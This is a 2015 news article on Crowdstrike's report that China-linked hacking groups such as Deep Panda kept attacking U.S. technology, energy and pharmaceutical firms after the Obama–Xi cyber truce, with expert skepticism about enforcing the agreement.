Update: Chinese Govt. Hackers Still Active Despite Truce

A timeline compares President Xi's visit to the U.S. with recorded attacks on critical U.S. industries linked to groups in China.
A timeline compares President Xi’s visit to the U.S. with recorded attacks on critical U.S. industries linked to groups in China.

In-brief: A truce hammered out between U.S. President Barack Obama and Chinese President Xi Jinping in September hasn’t kept hacking groups that are believed to be affiliated with China’s People’s Liberation Army (PLA) from playing offense, according to a report from the security firm Crowdstrike. (Updated to add comment from Ken Westin of Tripwire. PFR 10/19/2015)

A truce hammered out between U.S. President Barack Obama and Chinese President Xi Jinping in September hasn’t kept hacking groups that are believed to be affiliated with China’s People’s Liberation Army (PLA) from playing offense, according to a report from the security firm Crowdstrike.

Hacking groups with known or suspected connections to the Chinese military and Communist Party have been observed breaking into U.S. firms that “fit squarely within the hacking prohibitions covered under the Cyber agreement,” including one incident that occurred the day after the bilateral agreement was signed, according to a blog post on Monday by Dmitri Alperovitch, Crowdstrike’s co-founder and CTO.

The company, which sells software and services designed to spot and block sophisticated cyber attackers, released a timeline that shows 13 recorded attacks since President Xi’s visit to the United States began, on September 21st. Those include attacks on companies in the technology, energy and pharmaceutical sectors.

[Read Security Ledger coverage of advanced attacks.]

The attacks were not all successful. But they were traceable to known hacking groups, including Deep Panda, a long-running hacking crew that specializes in compromising defense industrial base firms and other companies in sectors that are known to be of interest to China’s leaders, including agriculture, chemical, financial services, healthcare, insurance and law, Alperovitch said.

Chinese Foreign Ministry spokeswoman Hua Chunying, speaking with the Reuters News Agency, denied that the government was behind the incidents.

“Internet hacking attacks are marked by their secretive, cross border nature,” she told a daily news briefing.

Crowdstrike said the intrusions were frequently carried out via attacks on Web servers using techniques like SQL injection, in which malicious commands are sent to a SQL database server. Successful compromises were followed by the placement of malicious “China Chopper” webshells, a piece of malware that gives attackers a toe hold on compromised networks.  Crowdstrike said it has also detected attacks that deployed the Derusbi and PlugX malware, which are tools of choice for other Chinese hacking crews.

The company informed the White House about its findings. A senior Obama administration official, who asked to remain anonymous, said the government was aware of CrowdStrike’s findings but declined to address its conclusions, Reuters reported.

The Obama Administration promoted the September agreement between Xi and President Obama as a diplomatic victory and a way to remove pressure from U.S. corporations, who have long suffered from devastating and targeted attacks by groups with links to China. On September 25, the United States and China agreed that “timely responses should be provided to requests for information and assistance concerning malicious cyber activities” and to “cooperate, in a manner consistent with their respective national laws and relevant international obligations, with requests to investigate cyber crimes, collect electronic evidence, and mitigate malicious cyber activity emanating from their territory.” More important: the two sides agreed that “neither country’s government will conduct or knowingly support cyber-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.”

Still, experts were skeptical that any agreement could quell attempts by China or other nations to siphon off valuable intelligence or intellectual property from U.S. firms, especially given the difficulty in attributing cyber attacks to a specific nation or actor.

The agreement between the two governments was political, notes Ken Westin, a senior security analyst at the firm Tripwire. But as a practical matter, it excludes many possible types of espionage, and lacks the specificity or legal standing to be enforceable, he said. “I think there’s a lot of loosey goosey language,” Westin said.

Besides, were hacking from China to cease in the wake of the agreement, it would only reinforce the links between the hacking groups and the Chinese government, proving the U.S.’s point, Westin observes.

While the agreement may at least lay the groundwork for China cooperating in legal prosecution of hacking groups working within its borders, it is doubtful that the U.S. intelligence community would be eager to reveal its methods for connecting attacks to specifc threat actors within the People’s Republic of China, Westin said. “I think (the U.S.) is stuck in a log jam,” he said.